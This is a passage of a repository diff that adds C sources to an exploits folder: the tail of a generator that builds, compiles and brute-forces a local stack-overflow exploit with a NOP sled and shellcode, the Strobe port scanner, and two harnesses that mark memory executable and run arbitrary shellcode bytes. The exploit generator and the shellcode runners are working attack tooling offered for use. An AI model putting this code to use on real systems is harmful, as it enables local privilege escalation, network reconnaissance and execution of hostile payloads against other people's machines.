" ret_add = strtoul (argv[1], &argv[1], 16);\n\n");
fprintf (fd, " bufz = buf + ALIGN;\n add_ptr = (long *)bufz;\n\n"
" for (x=0; x<BUFFER-1; x+=4)\n"
" *(add_ptr++)=ret_add;\n\n");
if (env)
{
if (step)
{
fprintf (fd, " /* nop + shellcode */\n memset ((char *)buf, NOP, 333 + "
"strlen (sharkode));\n memcpy ((char *)buf+333, sharkode, "
"strlen (sharkode));\n\n");
}
else
{
fprintf (fd, " /* nop + shellcode */\n memset ((char *)buf, NOP, 333 + "
"strlen (test));\n memcpy ((char *)buf+333, test, strlen "
"(test));\n\n");
}
}
else /* standard exploiting */
{
fprintf (fd, " /* nop + shellcode */\n memset ((char *)out, NOP, OUTSIDE);\n");
if (step)
fprintf (fd, " memcpy ((char *)out + 333, sharkode, strlen(sharkode));\n\n");
else
fprintf (fd, " memcpy ((char *)out + 333, test, strlen(test));\n\n");
fprintf (fd, " memcpy((char *)out, \"OUT=\", 4);\n putenv(out);\n\n");
}
/* environment bugged ? */
if (env)
{
if(step)
fprintf (fd, "\n");
fprintf (fd, " setenv (\"%s\", buf, 333);\n", env);
}
if (step)
fprintf (fd, "\n fprintf (stdout, \" Local exploit for %s\");\n", bin);
/* switch ? */
if (w)
fprintf (fd, " execl (BIN, BIN, \"%s\", buf, NULL);\n", w);
else
{
if (env)
fprintf (fd, " execl (BIN, BIN, NULL);\n");
else
fprintf (fd, " execl (BIN, BIN, buf, NULL);\n");
}
fprintf (fd, "\n return 0;\n}\n\n");
fclose (fd);
/* compile & test exploit */
if (!step)
{
sprintf (exe, "gcc %s -o exploit", EXPLOIT);
system (exe);
fprintf (stdout, " [*] exploit created\n");
fprintf (stdout, " [*] now find correct ret add\n");
if (( ret_add = xes (hard) ) == 0x333)
{
if (hard)
{
fprintf (fd, " [-] exploit doesn't work ...\n"
" [**] maybe binary has not -stack- overflow problem [**]\n"
" [-] other problems can be detected by reading source code ...\n"
" [-] sorry\n");
exit (-333);
}
else
hard=1;
goto do_sploit;
}
else
{
step=1;
goto do_sploit;
}
}
system ("rm -rf exploit xes");
fprintf (stdout, "\n [*] your working exploit for %s is ready !\n\n", bin);
return 0;
}

991
Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/strobe.c Normal file
View file

@ -0,0 +1,991 @@
/*
* Strobe (c) 1995 Julian Assange (proff@suburbia.net),
* All rights reserved.
* Port Scanner
* $ cc strobe.c -o strobe
*/
#define VERSION "1.03"
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/time.h>
#include <ctype.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/socket.h>
#ifdef _AIX
# include <sys/select.h>
#endif
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <string.h>
#include <errno.h>
#if defined(solaris) || defined(linux) || defined(__FreeBSD__) || defined(__NetBSD__) || defined(__GCC__)
# define fvoid void
#else
# define fvoid
extern int optind;
extern char *optarg;
#endif
#define bool char
#ifndef INADDR_NONE
# define INADDR_NONE ((unsigned long)-1)
#endif
#define port_t (unsigned short)
/*
* the below should be set via the Makefile, but if not...
*/
#ifndef ETC_SERVICES
# define ETC_SERVICES "/etc/services"
#endif
#ifndef STROBE_SERVICES
# define STROBE_SERVICES "strobe.services"
#endif
#ifndef LIB_STROBE_SERVICES
# define LIB_STROBE_SERVICES "/usr/local/lib/strobe.services"
#endif
int a_timeout = 20;
char *a_output = NULL;
char *a_services = "strobe.services";
char *a_input = NULL;
/* char *a_prescan = NULL; */
int a_start = 1;
int a_end = 65535;
int a_sock_max = 64;
int a_abort = 0;
int a_bindport = 0;
char *a_bindaddr= NULL;
struct in_addr bindaddr;
bool f_linear = 0;
bool f_verbose = 0;
bool f_verbose_stats = 0;
bool f_fast = 0;
bool f_stats = 0;
bool f_quiet = 0;
bool f_delete_dupes = 0;
bool f_minimise = 0;
bool f_dontgetpeername = 0;
int connects = 0;
int hosts_done = 0;
int attempts_done = 0;
int attempts_outstanding = 0;
struct timeval time_start;
fd_set set_sel;
fd_set set_sel_r;
fd_set set_sel_w;
int host_n;
int Argc;
char **Argv;
FILE *fh_input;
#define HO_ACTIVE 1
#define HO_ABORT 2
#define HO_COMPLETING 4
struct hosts_s
{
char *name;
struct in_addr in_addr;
int port;
int portlist_ent;
struct timeval time_used;
struct timeval time_start;
int attempts;
int attempts_done;
int attempts_highest_done;
int connects;
time_t notice_abort;
int status;
};
struct hosts_s ho_initial;
struct hosts_s *hosts;
#define HT_SOCKET 1
#define HT_CONNECTING 2
struct htuple_s
{
char *name;
struct in_addr in_addr;
int port;
int sfd;
int status;
struct timeval sock_start;
int timeout;
struct hosts_s *host;
};
struct htuple_s ht_initial;
struct htuple_s *attempt;
struct port_desc_s
{
int port;
char *name;
char *portname;
struct port_desc_s *next;
struct port_desc_s *next_port;
};
struct port_desc_s **port_descs;
int *portlist = NULL;
int portlist_n = 0;
char *
Srealloc (ptr, len)
char *ptr;
int len;
{
char *p;
int retries = 10;
while (!(p = ptr? realloc (ptr, len): malloc(len)))
{
if (!--retries)
{
perror("malloc");
exit(1);
}
if (!f_quiet)
fprintf(stderr, "Smalloc: couldn't allocate %d bytes...sleeping\n", len);
sleep (2);
}
return p;
}
char *
Smalloc (len)
int len;
{
return Srealloc (NULL, len);
}
fvoid
sock_block (sfd)
int sfd;
{
int flags;
flags = (~O_NONBLOCK) & fcntl (sfd, F_GETFL);
fcntl (sfd, F_SETFL, flags);
}
fvoid
sock_unblock (sfd)
int sfd;
{
int flags;
flags = O_NONBLOCK | fcntl (sfd, F_GETFL);
fcntl (sfd, F_SETFL, flags);
}
int
timeval_subtract (result, x, y) /* from gnu c-lib info.texi */
struct timeval *result, *x, *y;
{
/* Perform the carry for the later subtraction by updating y. */
if (x->tv_usec < y->tv_usec) {
int nsec = (y->tv_usec - x->tv_usec) / 1000000 + 1;
y->tv_usec -= 1000000 * nsec;
y->tv_sec += nsec;
}
if (x->tv_usec - y->tv_usec > 1000000) {
int nsec = (y->tv_usec - x->tv_usec) / 1000000;
y->tv_usec += 1000000 * nsec;
y->tv_sec -= nsec;
}
/* Compute the time remaining to wait.
`tv_usec' is certainly positive. */
result->tv_sec = x->tv_sec - y->tv_sec;
result->tv_usec = x->tv_usec - y->tv_usec;
/* Return 1 if result is negative. */
return x->tv_sec < y->tv_sec;
}
fvoid
attempt_clear (h)
struct htuple_s *h;
{
if (h->status & HT_SOCKET)
{
struct timeval tv1, tv2;
gettimeofday(&tv1, NULL);
timeval_subtract(&tv2, &tv1, &(h->sock_start));
h->host->time_used.tv_sec+=tv2.tv_sec;
if ((h->host->time_used.tv_usec+=tv2.tv_usec) >= 1000000)
{
h->host->time_used.tv_usec -= 1000000;
h->host->time_used.tv_sec++;
}
attempts_done++;
h->host->attempts_done++;
if (h->port > h->host->attempts_highest_done)
h->host->attempts_highest_done=h->port;
sock_unblock (h->sfd);
/* shutdown (h->sfd, 2); */
close (h->sfd);
if (FD_ISSET(h->sfd, &set_sel))
{
FD_CLR (h->sfd, &set_sel);
attempts_outstanding--;
}
}
*h = ht_initial;
}
fvoid
clear_all ()
{
int n;
for (n = 0; n < a_sock_max; n++)
attempt_clear (&attempt[n]);
}
fvoid
attempt_init ()
{
int n;
for (n = 0; n < a_sock_max; n++)
attempt[n] = ht_initial;
}
fvoid
hosts_init ()
{
int n;
for (n = 0; n < a_sock_max; n++)
hosts[n] = ho_initial;
}
fvoid
fdsets_init ()
{
FD_ZERO(&set_sel_r); /* yes, we have to do this, despite the later */
FD_ZERO(&set_sel_w); /* assisgnments */
FD_ZERO(&set_sel);
}
int
sc_connect (h)
struct htuple_s *h;
{
struct sockaddr_in sa_in;
int sopts1 = 1;
struct linger slinger;
if ((h->sfd = socket (PF_INET, SOCK_STREAM, 0)) == -1)
return 0;
memset(&sa_in, 0, sizeof(sa_in));
h->status |= HT_SOCKET;
gettimeofday(&(h->sock_start), NULL);
sock_unblock (h->sfd);
setsockopt (h->sfd, SOL_SOCKET, SO_REUSEADDR, (char *) &sopts1, sizeof (sopts1));
setsockopt (h->sfd, SOL_SOCKET, SO_OOBINLINE, (char *) &sopts1, sizeof (sopts1));
slinger.l_onoff = 0; /* off */
setsockopt (h->sfd, SOL_SOCKET, SO_LINGER, (char *) &slinger, sizeof (slinger));
sa_in.sin_family = AF_INET;
if (a_bindport)
sa_in.sin_port = a_bindport;
if (a_bindaddr)
sa_in.sin_addr = bindaddr;
if (a_bindaddr || a_bindport)
if (bind (h->sfd, (struct sockaddr *)&sa_in, sizeof(sa_in)) == -1)
{
fprintf(stderr, "couldn't bind %s : %d ", a_bindaddr? a_bindaddr: "0.0.0.0", ntohs(a_bindport));
perror("");
if (errno == EACCES)
exit(1);
return 0;
}
sa_in.sin_addr = h->in_addr;
sa_in.sin_port = htons (h->port);
if (connect (h->sfd, (struct sockaddr *) &sa_in, sizeof (sa_in)) == -1)
{
switch (errno)
{
case EINPROGRESS:
case EWOULDBLOCK:
break;
case ETIMEDOUT:
case ECONNREFUSED:
case EADDRNOTAVAIL:
if (f_verbose)
{
fprintf(stderr, "%s:%d ", h->name, h->port);
perror("");
}
h->host->attempts++;
attempt_clear (h);
return 1;
default:
if (!f_quiet)
{
fprintf(stderr, "%s:%d ", h->name, h->port);
perror ("");
}
attempt_clear (h);
return 0;
}
}
h->host->attempts++;
h->status |= HT_CONNECTING;
sock_block (h->sfd);
FD_SET(h->sfd, &set_sel);
attempts_outstanding++;
return 1;
}
int
gatherer_tcp (h)
struct htuple_s *h;
{
struct port_desc_s *pd;
if (f_minimise)
printf ("%s\t%d\n", h->name, h->port);
else
{
if ((pd = port_descs[h->port]))
{
printf ("%-30s %-16s %5d/tcp %s\n", h->name, pd->portname, h->port, pd->name);
while (!f_delete_dupes && !f_minimise && (pd=pd->next))
printf ("#%-29s %-16s %5d/tcp %s\n", h->name, pd->portname, h->port, pd->name);
}
else
printf ("%-30s %-16s %5d/tcp unassigned\n", h->name, "unknown", h->port);
}
h->host->connects++;
connects++;
attempt_clear (h);
return 1;
}
bool
gather ()
{
struct timeval timeout;
struct htuple_s *h;
int n;
int selected;
time_t tim;
if (!attempts_outstanding) return 1;
set_sel_r=set_sel_w=set_sel;
timeout.tv_sec = 0;
timeout.tv_usec = 250000; /* 1/4 of a second */
selected = select (FD_SETSIZE, &set_sel_r, &set_sel_w, 0, &timeout);
/* Look for timeouts */
tim = time (NULL);
for ( n = 0 ; n < a_sock_max; n++ )
{
h = &attempt[n];
if ((h->status & HT_SOCKET) &&
((h->sock_start.tv_sec + h->timeout) < tim))
attempt_clear (h);
}
switch (selected)
{
case -1:
perror ("select");
return 0;
case 0:
return 1;
}
for (n = 0; selected && (n < a_sock_max); n++)
{
h = &attempt[n];
if (h->status & HT_CONNECTING)
{
if (FD_ISSET (h->sfd, &set_sel_r) || FD_ISSET (h->sfd, &set_sel_w))
{
struct sockaddr_in in;
int len = sizeof (in);
selected--;
/* select() lies occasionaly
*/
if (!f_dontgetpeername) /* but solaris2.3 crashes occasionally ;-| */
{
if (getpeername (h->sfd, (struct sockaddr *) &in, &len) == 0)
gatherer_tcp (h);
else
attempt_clear (h);
}
else
gatherer_tcp (h);
}
}
}
return 1;
}
bool
add_attempt (add)
struct htuple_s *add;
{
struct htuple_s *h;
static time_t oldtime;
static int n;
for (;;)
{
for (; n < a_sock_max; n++)
{
h = &attempt[n];
if (!h->status)
goto foundfree;
}
n = 0;
gather ();
continue;
foundfree:
*h = *add;
if (!sc_connect (h))
{
gather ();
continue;
}
if ((oldtime + 1) < time (NULL))
{
oldtime = time (NULL);
gather ();
}
break;
}
return 1;
}
int
scatter (host, timeout)
struct hosts_s *host;
int timeout;
{
static struct htuple_s add;
add = ht_initial;
add.host = host;
add.name = host->name;
add.in_addr = host->in_addr;
add.port = host->port;
add.timeout = timeout;
if (f_verbose)
fprintf (stderr, "attempting port=%d host=%s\n", add.port, add.name);
add_attempt (&add);
return 1;
}
fvoid
wait_end (t)
int t;
{
time_t st;
st = time (NULL);
while ((st + t) > time (NULL))
{
gather ();
if (attempts_outstanding<1) break;
}
}
struct in_addr
resolve (name)
char *name;
{
static struct in_addr in;
unsigned long l;
struct hostent *ent;
if ((l = inet_addr (name)) != INADDR_NONE)
{
in.s_addr = l;
return in;
}
if (!(ent = gethostbyname (name)))
{
perror (name);
in.s_addr = INADDR_NONE;
return in;
}
return *(struct in_addr *) ent->h_addr;
}
char *
next_host ()
{
static char lbuf[512];
hosts_done++;
if (a_input)
{
int n;
reread:
if (!fgets (lbuf, sizeof (lbuf), fh_input))
{
fclose (fh_input);
a_input = NULL;
return next_host();
}
if (strchr("# \t\n\r", lbuf[0])) goto reread;
n = strcspn (lbuf, " \t\n\r");
if (n)
lbuf[n] = '\0';
return lbuf;
}
if ( host_n >= Argc )
return NULL;
return Argv[host_n++];
}
bool
host_init (h, name, nocheck)
struct hosts_s *h;
char *name;
bool nocheck;
{
int n;
*h=ho_initial;
h->in_addr = resolve (name);
if (h->in_addr.s_addr == INADDR_NONE)
return 0;
if (!nocheck)
for (n=0; n<a_sock_max; n++)
{
if (hosts[n].name && hosts[n].in_addr.s_addr==h->in_addr.s_addr)
{
if (!f_quiet)
fprintf(stderr, "ip duplication: %s == %s (last host ignored)\n",
hosts[n].name, name);
return 0;
}
}
h->name = (char *) Smalloc (strlen (name) + 1);
strcpy (h->name, name);
h->port = a_start;
h->status = HO_ACTIVE;
gettimeofday(&(h->time_start), NULL);
return 1;
}
fvoid
host_clear (h)
struct hosts_s *h;
{
if (h->name)
{
free (h->name);
}
*h=ho_initial;
}
fvoid
host_stats (h)
struct hosts_s *h;
{
struct timeval tv, tv2;
float t, st;
gettimeofday(&tv, NULL);
timeval_subtract(&tv2, &tv, &(h->time_start));
t = tv2.tv_sec+(float)tv2.tv_usec/1000000.0;
st = h->time_used.tv_sec+(float)h->time_used.tv_usec/1000000.0;
fprintf(stderr, "stats: host = %s trys = %d cons = %d time = %.2fs trys/s = %.2f trys/ss = %.2f\n",
h->name, h->attempts_done, h->connects, t, h->attempts_done/t, h->attempts_done/st);
}
fvoid
final_stats()
{
struct timeval tv, tv2;
float t;
gettimeofday(&tv, NULL);
timeval_subtract(&tv2, &tv, &(time_start));
t = tv2.tv_sec+(float)tv2.tv_usec/1000000.0;
fprintf(stderr, "stats: hosts = %d trys = %d cons = %d time = %.2fs trys/s = %.2f\n",
hosts_done, attempts_done, connects, t, attempts_done/t);
}
bool skip_host(h)
struct hosts_s *h;
{
if (a_abort && !h->connects && (h->attempts_highest_done >= a_abort)) /* async pain */
{
if (h->status & HO_ABORT)
{
if ((time(NULL)-h->notice_abort)>a_timeout)
{
if (f_verbose)
fprintf(stderr, "skipping: %s (no connects in %d attempts)\n",
h->name, h->attempts_done);
return 1;
}
} else
{
h->notice_abort=time(NULL);
h->status|=HO_ABORT;
}
}
return 0;
}
int
next_port (h)
struct hosts_s *h;
{
int n;
for (n = h->port; ++n <= a_end;)
{
if (!f_fast) return n;
if (++h->portlist_ent>portlist_n) return -1;
return (portlist[h->portlist_ent-1]);
}
return -1;
}
fvoid
scan_ports_linear ()
{
struct hosts_s host;
char *name;
while ((name = next_host ()))
{
if (!host_init(&host, name, 1)) continue;
for (;;)
{
scatter (&host, a_timeout);
if (skip_host(&host)) break;
if ((host.port = next_port(&host))==-1)
break;
}
wait_end (a_timeout);
if (f_verbose_stats)
host_stats (&host);
clear_all ();
host_clear(&host);
}
}
/* Huristics:
* o fast connections have priority == maximise bandwidth i.e
* a port in the hand is worth two in the bush
*
* o newer hosts have priority == lower ports checked more quickly
*
* o all hosts eventually get equal "socket time" == despite
* priorities let no one host hog the sockets permanently
*
* o when host usage times are equal (typically on or shortly after
* initial startup) distribute hosts<->sockets evenly rather than
* play a game of chaotic bifurcatic ping-pong
*/
fvoid
scan_ports_paralell ()
{
int n;
struct timeval smallest_val;
int smallest_cnt;
char *name;
struct hosts_s *h, *smallest = &hosts[0];
while (smallest)
{
smallest_val.tv_sec=0xfffffff;
smallest_val.tv_usec=0;
for (n = 0, smallest_cnt = 0xfffffff, smallest = NULL; n < a_sock_max; n++)
{
h = &hosts[n];
if (((h->status & HO_COMPLETING) &&
(h->attempts_done == h->attempts)) ||
skip_host(h))
{
if (f_verbose_stats) host_stats (h);
host_clear (h);
}
if (!h->name && ((name = next_host ())))
if (!host_init (h, name, 0))
{
host_clear (h);
continue;
}
if (h->name)
{
if (((h->time_used.tv_sec < smallest_val.tv_sec) ||
((h->time_used.tv_sec == smallest_val.tv_sec) &&
(h->time_used.tv_usec <= smallest_val.tv_usec))) &&
(((h->time_used.tv_sec != smallest_val.tv_sec) &&
(h->time_used.tv_usec != smallest_val.tv_usec)) ||
(h->attempts < smallest_cnt)))
{
smallest_cnt = h->attempts;
smallest_val = h->time_used;
smallest = h;
}
}
}
if (smallest)
{
if (!(smallest->status & HO_COMPLETING))
{
scatter (smallest, a_timeout);
if ((smallest->port=next_port(smallest))==-1)
smallest->status|=HO_COMPLETING;
}
else
gather();
}
}
}
fvoid
loaddescs ()
{
FILE *fh;
char lbuf[1024];
char desc[256];
char portname[17];
unsigned int port;
char *fn;
char prot[4];
prot[3]='\0';
if (!(fh = fopen ((fn=a_services), "r")) &&
!(fh = fopen ((fn=LIB_STROBE_SERVICES), "r")) &&
!(fh = fopen ((fn=ETC_SERVICES), "r")))
{
perror (fn);
exit (1);
}
port_descs=(struct port_desc_s **) Smalloc(sizeof(struct port_descs_s *) * 65536);
memset(port_descs, 0, 65536);
while (fgets (lbuf, sizeof (lbuf), fh))
{
char *p;
struct port_desc_s *pd, *pdp;
if (strchr("*# \t\n", lbuf[0])) continue;
if (!(p = strchr (lbuf, '/'))) continue;
*p = ' ';
desc[0]='\0';
if (sscanf (lbuf, "%16s %u %3s %255[^\r\n]", portname, &port, prot, desc) <3 || strcmp (prot, "tcp") || (port > 65535))
continue;
pd = port_descs[port];
if (!pd)
{
portlist = (int *)Srealloc((char *)portlist, ++portlist_n*sizeof(int));
portlist[portlist_n-1]=port;
}
if (!f_minimise)
{
pdp = (struct port_desc_s *) Smalloc (sizeof (*pd) + strlen (desc) + 1 + strlen (portname) + 1);
if (pd)
{
for (; pd->next; pd = pd->next);
pd->next = pdp;
pd = pd->next;
} else
{
pd = pdp;
port_descs[port] = pd;
}
pd->next = NULL;
pd->name = (char *) (pd) + sizeof (*pd);
pd->portname = pd->name + strlen(desc)+1;
strcpy (pd->name, desc);
strcpy (pd->portname, portname);
} else
port_descs[port] = (struct port_desc_s *)-1;
}
if (f_minimise)
free (port_descs);
}
fvoid
usage ()
{
fprintf (stderr, "\
usage: %8s [options]\n\
\t\t[-v(erbose)]\n\
\t\t[-V(erbose_stats]\n\
\t\t[-m(inimise)]\n\
\t\t[-d(elete_dupes)]\n\
\t\t[-g(etpeername_disable)]\n\
\t\t[-s(tatistics)]\n\
\t\t[-q(uiet)]\n\
\t\t[-o output_file]\n\
\t\t[-b begin_port_n]\n\
\t\t[-e end_port_n]\n\
\t\t[-p single_port_n]\n\
\t\t[-P bind_port_n]\n\
\t\t[-A bind_addr_n]\n\
\t\t[-t timeout_n]\n\
\t\t[-n num_sockets_n]\n\
\t\t[-S services_file]\n\
\t\t[-i hosts_input_file]\n\
\t\t[-l(inear)]\n\
\t\t[-f(ast)]\n\
\t\t[-a abort_after_port_n]\n\
\t\t[-M(ail_author)]\n\
\t\t[host1 [...host_n]]\n", Argv[0]);
exit (1);
}
int
main (argc, argv)
int argc;
char **argv;
{
int c;
Argc = argc;
Argv = argv;
while ((c = getopt (argc, argv, "o:dvVmgb:e:p:P:a:A:t:n:S:i:lfsqM")) != -1)
switch (c)
{
case 'o':
a_output = optarg;
break;
case 'd':
f_delete_dupes=1;
break;
case 'v':
f_verbose = 1;
break;
case 'V':
f_verbose_stats = 1;
break;
case 'm':
f_minimise = 1;
break;
case 'g':
f_dontgetpeername = 1;
break;
case 'b':
a_start = atoi (optarg);
break;
case 'e':
a_end = atoi (optarg);
break;
case 'P':
a_bindport = htons (atoi (optarg));
break;
case 'A':
a_bindaddr = optarg;
bindaddr = resolve (a_bindaddr);
if (bindaddr.s_addr == INADDR_NONE)
{
perror(a_bindaddr);
exit(1);
}
break;
case 'p':
a_start = a_end = atoi (optarg);
break;
case 'a':
a_abort = atoi (optarg);
break;
case 't':
a_timeout = atoi (optarg);
break;
case 'n':
a_sock_max = atoi (optarg);
break;
case 'S':
a_services = optarg;
break;
case 'i':
a_input = optarg;
break;
case 'l':
f_linear = 1;
break;
case 'f':
f_fast = 1;
break;
case 's':
f_stats = 1;
break;
case 'q':
f_quiet = 1;
break;
case 'M':
fprintf(stderr, "Enter mail to author below. End with ^D or .\n");
system("mail strobe@suburbia.net");
break;
case '?':
default:
fprintf (stderr, "unknown option %s\n", argv[optind-1]);
usage ();
/* NOT_REACHED */
}
host_n = optind;
if (!f_quiet)
fprintf (stderr, "strobe %s (c) 1995 Julian Assange (proff@suburbia.net).\n", VERSION);
if (a_input)
{
if ( ! strcmp("-",a_input) ) { /* Use stdin as input file */
fh_input = stdin;
}
else {
if (!(fh_input = fopen (a_input, "r")))
{
perror (a_input);
exit (1);
}
}
} else
{
switch ( argc - host_n ) { /* Number of hosts found on command line */
case 0:
fh_input = stdin;
a_input = "stdin"; /* Needed in "next_host()" */
break;
case 1:
f_linear = 1;
break;
}
}
if ((fh_input==stdin) && !f_quiet)
fprintf (stderr, "Reading host names from stdin...\n");
if (a_output)
{
int fd;
if ((fd=open(a_output, O_WRONLY|O_CREAT|O_TRUNC, 0666))==-1)
{
perror(a_output);
exit(1);
}
dup2(fd, 1);
}
attempt = (struct htuple_s *) Smalloc (a_sock_max * sizeof (struct htuple_s));
attempt_init();
if (!f_linear)
{
hosts = (struct hosts_s *) Smalloc (a_sock_max * sizeof (struct hosts_s));
hosts_init();
}
if (!f_minimise || f_fast)
loaddescs ();
fdsets_init();
gettimeofday(&time_start, NULL);
f_linear ? scan_ports_linear ():
scan_ports_paralell ();
if (f_stats || f_verbose_stats)
final_stats();
exit (0);
}

98
Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/testing_shellcode.c Normal file
View file

@ -0,0 +1,98 @@
/* Test Shellcode */
/*
* Generic program for testing shellcode byte arrays.
* Created by zillion and EVL
*
* Safemode.org !! Safemode.org !!
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <errno.h>
/*
* Print message
*/
static void
croak(const char *msg) {
fprintf(stderr, "%s\n", msg);
fflush(stderr);
}
/*
* Educate user.
*/
static void
usage(const char *prgnam) {
fprintf(stderr, "\nExecute code : %s -e <file-containing-shellcode>\n", prgnam);
fprintf(stderr, "Convert code : %s -p <file-containing-shellcode> \n\n", prgnam);
fflush(stderr);
exit(1);
}
/*
* Signal error and bail out.
*/
static void
barf(const char *msg) {
perror(msg);
exit(1);
}
/*
* Main code starts here
*/
int
main(int argc, char **argv) {
FILE *fp;
void *code;
int arg;
int i;
int l;
int m = 15; /* max # of bytes to print on one line */
struct stat sbuf;
long flen; /* Note: assume files are < 2**32 bytes long ;-) */
void (*fptr)(void);
if(argc < 3) usage(argv[0]);
if(stat(argv[2], &sbuf)) barf("failed to stat file");
flen = (long) sbuf.st_size;
if(!(code = malloc(flen))) barf("failed to grab required memeory");
if(!(fp = fopen(argv[2], "rb"))) barf("failed to open file");
if(fread(code, 1, flen, fp) != flen) barf("failed to slurp file");
if(fclose(fp)) barf("failed to close file");
while ((arg = getopt (argc, argv, "e:p:")) != -1){
switch (arg){
case 'e':
croak("Calling code ...");
fptr = (void (*)(void)) code;
(*fptr)();
break;
case 'p':
printf("\n\nchar shellcode[] =\n");
l = m;
for(i = 0; i < flen; ++i) {
if(l >= m) {
if(i) printf("\"\n");
printf( "\t\"");
l = 0;
}
++l;
printf("\\x%02x", ((unsigned char *)code)[i]);
}
printf("\";\n\n\n");
break;
default :
usage(argv[0]);
}
}
return 0;
}

299
Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/testing_shellcode2.c Normal file
View file

@ -0,0 +1,299 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <ctype.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/types.h> /* See NOTES */
#include <sys/wait.h>
#include <sys/socket.h>
/*------------------------------------------
Shellcode testing program
Usage:
shtest [-s socked_fd_no] {-f file | $'\xeb\xfe' | '\xb8\x39\x05\x00\x00\xc3'}
Usage example:
$ shtest $'\xeb\xfe' # raw shellcode
$ shtest '\xb8\x39\x05\x00\x00\xc3' # escaped shellcode
$ shtest -f test.sc # shellcode from file
$ shtest -f <(python gen_payload.py) # test generated payload
$ shtest -s 5 -f test.sc # create socket at fd=5
# Allows to test staged shellcodes
# Flow is redirected like this: STDIN -> SOCKET -> STDOUT
Compiling:
gcc -Wall shtest.c -o shtest
Author: hellman (hellman1908@gmail.com)
-------------------------------------------*/
char buf[4096];
int pid1, pid2;
int sock;
int ready;
void usage(char * err);
int main(int argc, char **argv);
void load_from_file(char *fname);
void copy_from_argument(char *arg);
void escape_error();
int create_sock();
void run_reader(int);
void run_writer(int);
void set_ready(int sig);
void run_shellcode(void *sc_ptr);
void usage(char * err) {
printf(" Shellcode testing program\n\
Usage:\n\
shtest {-f file | $'\\xeb\\xfe' | '\\xb8\\x39\\x05\\x00\\x00\\xc3'}\n\
Usage example:\n\
$ shtest $'\\xeb\\xfe' # raw shellcode\n\
$ shtest '\\xb8\\x39\\x05\\x00\\x00\\xc3' # escaped shellcode\n\
$ shtest -f test.sc # shellcode from file\n\
$ shtest -f <(python gen_payload.py) # test generated payload\n\
$ shtest -s 5 -f test.sc # create socket at fd=5 (STDIN <- SOCKET -> STDOUT)\n\
# Allows to test staged shellcodes\
# Flow is redirected like this: STDIN -> SOCKET -> STDOUT\
Compiling:\n\
gcc -Wall shtest.c -o shtest\n\
Author: hellman (hellman1908@gmail.com)\n");
if (err) printf("\nerr: %s\n", err);
exit(1);
}
int main(int argc, char **argv) {
char * fname = NULL;
int c;
pid1 = pid2 = -1;
sock = -1;
while ((c = getopt(argc, argv, "hus:f:")) != -1) {
switch (c) {
case 'f':
fname = optarg;
break;
case 's':
sock = atoi(optarg);
if (sock <= 2 || sock > 1024)
usage("bad descriptor number for sock");
break;
case 'h':
case 'u':
usage(NULL);
default:
usage("unknown argument");
}
}
if (argc == 1)
usage(NULL);
if (optind < argc && fname)
usage("can't load shellcode both from argument and file");
if (!(optind < argc) && !fname)
usage("please provide shellcode via either argument or file");
if (optind < argc) {
copy_from_argument(argv[optind]);
}
else {
load_from_file(fname);
}
//create socket if needed
if (sock != -1) {
int created_sock = create_sock(sock);
printf("Created socket %d\n", created_sock);
}
run_shellcode(buf);
return 100;
}
void load_from_file(char *fname) {
FILE * fd = fopen(fname, "r");
if (!fd) {
perror("fopen");
exit(100);
}
int c = fread(buf, 1, 4096, fd);
printf("Read %d bytes from '%s'\n", c, fname);
fclose(fd);
}
void copy_from_argument(char *arg) {
//try to translate from escapes ( \xc3 )
bzero(buf, sizeof(buf));
strncpy(buf, arg, sizeof(buf));
int i;
char *p1 = buf;
char *p2 = buf;
char *end = p1 + strlen(p1);
while (p1 < end) {
i = sscanf(p1, "\\x%02x", (unsigned int *)p2);
if (i != 1) {
if (p2 == p1) break;
else escape_error();
}
p1 += 4;
p2 += 1;
}
}
void escape_error() {
printf("Shellcode is incorrectly escaped!\n");
exit(1);
}
int create_sock() {
int fds[2];
int sock2;
int result = socketpair(AF_UNIX, SOCK_STREAM, 0, fds);
if (result == -1) {
perror("socket");
exit(101);
}
if (sock == fds[0]) {
sock2 = fds[1];
}
else if (sock == fds[1]) {
sock2 = fds[0];
}
else {
dup2(fds[0], sock);
close(fds[0]);
sock2 = fds[1];
}
ready = 0;
signal(SIGUSR1, set_ready);
/*
writer: stdin -> socket (when SC exits/fails, receives SIGCHLD and exits)
\--> main: shellcode (when exits/fails, sends SIGCHLD to writer and closes socket)
\--> reader: sock -> stdout (when SC exits/fails, socket is closed and reader exits)
main saves pid1 = reader,
pid2 = writer
to send them SIGUSR1 right before running shellcode
*/
pid1 = fork();
if (pid1 == 0) {
close(sock);
run_reader(sock2);
}
pid2 = fork();
if (pid2 > 0) { // parent - writer
signal(SIGCHLD, exit);
close(sock);
run_writer(sock2);
}
pid2 = getppid();
close(sock2);
return sock;
}
void run_reader(int fd) {
char buf[4096];
int n;
while (!ready) {
usleep(0.1);
}
while (1) {
n = read(fd, buf, sizeof(buf));
if (n > 0) {
printf("RECV %d bytes FROM SOCKET: ", n);
fflush(stdout);
write(1, buf, n);
}
else {
exit(0);
}
}
}
void run_writer(int fd) {
char buf[4096];
int n;
while (!ready) {
usleep(0.1);
}
while (1) {
n = read(0, buf, sizeof(buf));
if (n > 0) {
printf("SENT %d bytes TO SOCKET\n", n);
write(fd, buf, n);
}
else {
shutdown(fd, SHUT_WR);
close(fd);
wait(&n);
exit(0);
}
}
}
void set_ready(int sig) {
ready = 1;
}
void run_shellcode(void *sc_ptr) {
int ret = 0, status = 0;
int (*ptr)();
ptr = sc_ptr;
mprotect((void *) ((unsigned int)ptr & 0xfffff000), 4096 * 2, 7);
void *esp, *ebp;
void *edi, *esi;
asm ("movl %%esp, %0;"
"movl %%ebp, %1;"
:"=r"(esp), "=r"(ebp));
asm ("movl %%esi, %0;"
"movl %%edi, %1;"
:"=r"(esi), "=r"(edi));
printf("Shellcode at %p\n", ptr);
printf("Registers before call:\n");
printf(" esp: %p, ebp: %p\n", esp, ebp);
printf(" esi: %p, edi: %p\n", esi, edi);
printf("----------------------\n");
if (pid1 > 0) kill(pid1, SIGUSR1);
